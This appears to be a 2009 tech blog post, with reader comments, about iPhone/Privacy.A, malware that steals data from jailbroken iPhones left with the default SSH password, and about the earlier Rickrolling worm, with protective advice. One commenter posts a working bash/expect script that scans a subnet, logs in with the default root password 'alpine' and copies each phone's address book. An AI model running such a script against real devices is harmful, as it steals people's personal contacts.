Jailbreakers beware: iPhone malware evolves rapidly
Over the weekend there were reports of the "Rickrolling" worm that targeted jailbroken iPhones which had SSH installed and still used the default password. While definitely a security hole for those who enabled these features, the threat was more of a prank and "proof-of-concept" than anything truly malicious. Yesterday, however, antivirus and security software developer Intego released information on another worm that has been built to steal information from these iPhone users.
The article by Intego mentions the new worm, dubbed "iPhone/Privacy.A", takes advantage of the same vulnerability as the Rickrolling worm, and once installed it will copy virtually any data off the phone that it wants; however, unlike the Rickrolling worm, this new variant does not give any indication that the phone has been infected.
Given that the Rickrolling worm paved the way to this vulnerability, it was only a matter of time before someone with truly malicious intent applied the technique to their malware, and not surprisingly it only took days.
With this new malware, It is apparently very easy to infect phones who's security has been compromised, and the target audience is fairly large (Intego estimates up to 8% of iPhones have been jailbroken). All a hacker has to do is set the malware up on a PC in a public arena and it will then establish connections with compromised iPhones in the vicinity.
This variant of the Rickrolling worm suggests one thing: Do not jailbreak your iPhone, especially if you are not aware of the risks since other vulnerabilities besides this current one may still be out there. If you suspect your phone has been infected, reset it to factory settings and start over. For those who still wish to jailbreak their phones, you can help protect yourself by changing the root password. To do this, follow the steps outlined by David Martin over at CNET's iPhoneAtlas.
Keep in mind that if you do not have a jailbroken iPhone, then you're not at risk for this malware; but if you do and you have SSH enabled then be cautioned that there is no indication that this new malware is on your phone.
Questions? Comments? Post them below or email us!
Be sure to check us out on Twitter and the CNET Mac forums.
1. There is a program that hackers run on a PC.
2. There is a worm that is installed on a jailbroken iPhone.
So, a PC sets up on a widely used public network and searches for iPhones that are jailbroken and contain the default SSH password. Though Topher did not state this implicitly in the article, he did correctly state that this program is a variation of the Rickrolling worm we saw a few days ago. The variation enables a PC to do the initial search and install any worm or other malware on jailbroken, default SSH password iPhones.
If you read my article from yesterday, this is exactly the "implications" I spoke of that could come from the Rick Astley demonstration. This program, derived from the original worm, is much more dangerous. It can be used to spread worms, install programs, or gain access to information on an infected iPhone.
So, this tech blog got it right. Topher was completely correct in his presentation of both programs and this has nothing to do with blowing things out of proportion. Because "consumer hackers" that jailbreak their iPhones typically do so without understanding the entire process, this hack could become seriously relevant ... and quickly. It is our responsibility to help get the word out so these things do not spread as quickly as they would otherwise.
Just link to something that says this is a self replicating worm because what you link to does not imply that at all. In fact it even says right in the last paragraph "While it is not possible to protect the iPhone from this hacker tool ? it does not install anything on an iPhone"
I'm not downplaying the issue here, people using default / insecure / blank passwords is good reason why there are so many worms / viruses / malware and I'm quite surprised there has not been a 'real' iPhone worm until recently.
I just want people to use the right terms.
As I said before, I think the correct terms were used, perhaps not clearly enough.
"Yesterday, however, antivirus and security software developer Intego released information on another *worm* that has been built to steal information from these iPhone users.
The article by Intego mentions the *new worm*, dubbed "iPhone/Privacy.A""
(emphasis mine)
Intego never says it's a worm.
And I hate to cite wikipedia but, http://en.wikipedia.org/wiki/Computer_worm "A computer worm is a self-replicating computer program".
" This article was not implying that the "hacker tool" was a self-replicating worm"
I'm not trying to give you a hard time, but this article flat out says this tool is a worm as I quoted above. Also and there is no such thing as a worm that does not self-replicate. The RickRolling worm *was a worm*, this *is not a worm*.
"That program exists due to code from the worm we reported earlier this week. " - What is your source on that?
Perhaps you are trying to link the fact that this one uses the same 'exploit' used in the worm, thus this new tool is also worm? ...
#!/bin/bash
for ((a=1; a <= 254 ; a++))
do
command=$(expect -c "
spawn spawn scp root@10.0.0.$a:/private/var/mobile/Library/AddressBook/AddressBook.sqlitedb /tmp/$a.sqlitedb
expect \"password:\"
send \"alpine\r\"")
echo $command
done
That does the same thing as this 'tool' (actually untested as my iPhone is in the car). Since it is using the same 'exploit', does that make this snippet of code a worm?
1. that just had to jailbreak their phones
and
2. downloaded something from the web they did not understand to achieve it
and
3. had no idea of the security risks involved
and
4. get nailed by this garbage
Apple told you so.
Description: Following the recent discovery of a worm that changes wallpaper on iPhones, Intego has spotted another piece of malware that attacks iPhones, one that is far more dangerous than the ikee worm. This hacker tool, which Intego identifies as iPhone/Privacy.A, takes advantage of the same vulnerability in the iPhone as the ikee worm, allowing hackers to connect to any jailbroken iPhone or iPod touch (iPhones or iPod touches hacked to allow installation of software other than through iTunes) whose owners have not changed the root password.
I have not altered it in any way, however, 'worm' is mentioned as is 'hacker tool' and 'malware'.
Intego is discussing the 'tool', software that runs from any computer and is used to scan for vulnerable iPhones.
The ikee worm was benign, this 'tool' or 'malware' is not. And from what Intego states it would appear to install a piece of malware that steals iPhone data on jail broken iPhones that have NOT changed their SSH password.
Arguing over semantics is worthless. What is of worth is that there are a lot of iPhones that are jail broken for whatever reason. I take it that not all are vulnerable, only if they are using SSH and have the default password not changed.
Advantage being taken of
1 - jail broken iPhones
2 - using a tool on the iPhone to allow computer accesses via SSH
3 - being stupid enough to not change a password for a tool that gives deep access to the iPhone
This is akin to what I tell my service customers who still insist on not setting a proper OS X password on their computers and go on the internet. While the Mac OS is still not a virus/worm or other target, hackers will try to access your computers if they can.
Just don't make it easy for them to do so.
-
by kool_skatkat
November 23, 2009 7:36 AM PST
- You'd think that the jail breaking tool creators would at least make it safe for their users and automate the process. Unless their focus is not more security but less security if it provides more freedom.
-
Like this
Reply to this comment
-
(8 Comments)If you loose money after jailbraking your phone, do get to sue the author of the tools?